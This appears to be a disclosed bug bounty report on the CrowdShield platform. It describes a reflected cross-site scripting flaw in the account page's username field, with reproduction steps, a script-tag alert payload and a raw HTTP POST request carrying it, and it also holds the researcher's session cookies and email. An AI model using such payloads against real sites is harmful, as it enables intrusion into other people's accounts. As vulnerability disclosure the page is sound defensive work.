Dashboard

Reflected Cross Site Scripting

Severity: Medium
Bug ID: 659
Researcher: pratap
Status: Disclosed
Submitted: 12/16/2014

Description:

An XSS Vulnerability exists in the account page. Steps to Reproduce: 1. Click on create a researcher account. 2. Select username as <script>alert(1);</script> 3. Click on create account. When the successful creation page is displayed, click on browser back button, 4. Reload the page and XSS is triggered.

Affected URL:

http://crowdshield.com/account.php

Affected Params:

researcher_username

Bug Evidence:

POST /account.php HTTP/1.1
Host: crowdshield.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://crowdshield.com/account.php
Cookie: __cfduid=d022fe4a4b859e83f2a384005c5dceb521418758454; PHPSESSID=8jet0csoiucsoiucj7qkfk7uv6; __utma=242435792.217988264.1418758459.1418758459.1418758459.1; __utmb=242435792.48.10.1418758459; __utmc=242435792; __utmz=242435792.1418758459.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _ga=GA1.2.217988264.1418758459; __utmt=1; _gat=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 315

researcher_email=pratap.14692%40gmail.com&researcher_username=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&researcher_password1=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&researcher_password2=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&researcher_terms=accept&submit=Create+Account&create_account=researcher&captcha=36




Bug Recommendation:

Sanitize evil input.

Direct Chat

5
pratap 12/16/2014
Message User Image
Submitted bug ID: 659 - Cross Site Scripting bug to CrowdShield
CrowdShield 12/16/2014
Message User Image
Acknowledged bug ID: 659 - Cross Site Scripting submitted by Pratap and awarded 20 points!
CrowdShield 12/16/2014
Message User Image
Fixed bug ID: 659 - Cross Site Scripting submitted by Pratap
CrowdShield 12/16/2014
Message User Image
Nice find! We accidentally left in echo $researcher_username for debugging and forgot to remove it... should be good now though.
CrowdShield 06/24/2015
Message User Image
disclosed a Cross Site Scripting bug submitted by Pratap

Pending Bugs

ID Severity Vulnerability User Date Status
692High Authentication Bypass dia2diab 07/01/2015 Disclosed
778High Privilege Escalation poseidon 08/24/2018 Disclosed
641High Privilege Escalation daksh 12/05/2014 Disclosed
744High Privilege Escalation realn0j 09/06/2017 Disclosed
670High Remote Code Execution zoczus 05/06/2015 Disclosed
593Medium Buffer Overflow rockcena 12/01/2014 Disclosed
578Medium Cross Site Request Forgery sandeepv 11/30/2014 Disclosed
580Medium Cross Site Request Forgery sandeepv 11/30/2014 Disclosed
659Medium Reflected Cross Site Scripting pratap 12/16/2014 Disclosed
742Low Application Errors guifre 07/29/2017 Disclosed
724Low Session Security and Cookies testingcs 04/24/2016 Disclosed
706Informational Other zediwon 09/28/2015 Disclosed
707Informational Other behroz 10/06/2015 Disclosed